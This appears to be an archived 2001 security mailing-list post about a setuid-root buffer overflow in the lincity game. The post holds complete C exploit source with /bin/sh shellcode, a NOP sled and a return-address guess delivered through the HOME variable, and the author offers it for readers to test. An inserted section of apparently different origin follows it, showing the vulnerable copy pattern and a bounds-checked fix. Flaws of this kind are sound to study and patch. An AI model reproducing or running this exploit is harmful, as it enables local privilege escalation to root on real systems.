Greetings,

While a buffer overflow is blatantly obvious in the code, I don't think it is very dangerous. Observe.

jaded:~> id
uid=1000(tfreak) gid=1000(tfreak) groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek)
jaded:~> ls -l /usr/games/lincity
-rwsr-xr-x 1 root root 769384 Mar 14 20:36 /usr/games/lincity
jaded:~> ./x
svgalib: Using S3 driver (Trio64, 2048K).
svgalib: s3: chipsets newer than S3-864 is not supported well yet.
svgalib: RAMDAC: Trio64: MCLK = 50.114 MHz
sh-2.01$ id
uid=1000(tfreak) gid=1000(tfreak) groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek)
sh-2.01$

Despite the setuid permissions, I was unable to obtain a root shell. I have included the exploit for you to test yourself; perhaps it will work on older versions of svgalib. Let me know how it turns out.

I remain,
tf.

/*
 * lincity-svga exploit by TFreak
 *
 * another example of bad programming, copying the HOME environment
 * without bounds checking to a static size buffer (100 bytes)
 *
 */

#include <stdio.h>
#include <stdlib.h>     /* malloc, setenv */
#include <string.h>     /* memset, strlen */
#include <unistd.h>     /* execl */

#define bs 250          /* size of the payload placed in HOME */
#define of 300          /* offset subtracted from the caller's stack pointer */

unsigned long sp (void);

int main(int argc, char *argv[])
{
    char *p, *buf;
    char shell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    unsigned long addr, *paddr;
    int i;

    buf = (char *) malloc(bs);
    p = buf;
    paddr = (unsigned long *) p;
    addr = sp() - of;

    /* fill the whole buffer with the guessed return address */
    for (i = 0; i < bs; i += 4)
        *(paddr++) = addr;

    /* first half becomes a NOP sled, shellcode follows it */
    memset(p, 0x90, bs/2);
    p += bs/2;
    for (i = 0; i < strlen(shell); i++)
        *(p++) = shell[i];

    /* the payload is delivered through the HOME environment variable */
    setenv("HOME", buf, 1);
    execl("/usr/games/lincity", "lincity", NULL);
}

/* returns the current stack pointer (value left in %eax) */
unsigned long sp (void)
{
    __asm__("movl %esp, %eax");
}
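The bug class the post describes (an environment value copied into a 100-byte static buffer with no length check) and the fix a maintainer would apply, as an added example that is not part of the post or of lincity's own source. The buffer size of 100 comes from the post; the function names, the sample HOME value and the constructed test lengths are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOME_BUF 100   /* the static buffer size the post describes */

/* Vulnerable pattern (the bug class in the post): copying $HOME into a
 * fixed-size buffer with no bounds check. Any value of 100 bytes or more
 * writes past the end of `out`. Shown only for contrast; it is called
 * below with a short, known value and must never see untrusted input. */
void load_home_unchecked(const char *home, char out[HOME_BUF])
{
    strcpy(out, home);
}

/* Hardened form: measure with a bounded scan, refuse anything that cannot
 * fit together with its terminator, and only then copy.
 * Returns 0 on success, -1 when the value is missing or too long. */
int load_home_checked(const char *home, char out[HOME_BUF])
{
    if (home == NULL)
        return -1;

    size_t n = 0;
    while (n < HOME_BUF && home[n] != '\0')   /* never reads past HOME_BUF bytes */
        n++;
    if (n >= HOME_BUF)
        return -1;                            /* 100 or more chars: no room for NUL */

    memcpy(out, home, n + 1);                 /* n + 1 copies the terminator too */
    return 0;
}

/* Test helper: build a hypothetical HOME value of `len` 'A' characters
 * (constructed input, not taken from the post) and report whether the
 * hardened copier accepts it. Returns the copier's result, -2 on OOM. */
int try_home_of_length(size_t len)
{
    char *home = malloc(len + 1);
    if (home == NULL)
        return -2;
    memset(home, 'A', len);
    home[len] = '\0';

    char out[HOME_BUF];
    int rc = load_home_checked(home, out);
    free(home);
    return rc;
}

/* Length of what landed in the buffer after a successful checked copy,
 * so a caller can confirm nothing was truncated silently; 0 on rejection. */
size_t copied_length(const char *home)
{
    char out[HOME_BUF];
    if (load_home_checked(home, out) != 0)
        return 0;
    return strlen(out);
}

int main(void)
{
    const char *sample = "/home/tfreak";   /* constructed sample value */
    char out[HOME_BUF];

    load_home_unchecked(sample, out);       /* safe here only because the input is short */
    printf("short value, checked copy rc=%d (%zu bytes)\n",
           load_home_checked(sample, out), copied_length(sample));
    printf("99-byte value  rc=%d\n", try_home_of_length(99));
    printf("100-byte value rc=%d\n", try_home_of_length(100));
    printf("300-byte value rc=%d\n", try_home_of_length(300));
    return 0;
}
```

The boundary that matters is 99 versus 100: a 99-character value plus its terminator exactly fills the buffer and is accepted, while 100 characters would need 101 bytes and are rejected before any byte is written. Rejecting is the right default for a setuid binary; falling back to a safe built-in path is also reasonable, but silently truncating is not, since the program would then operate on a path the user never supplied.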
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:39 PDT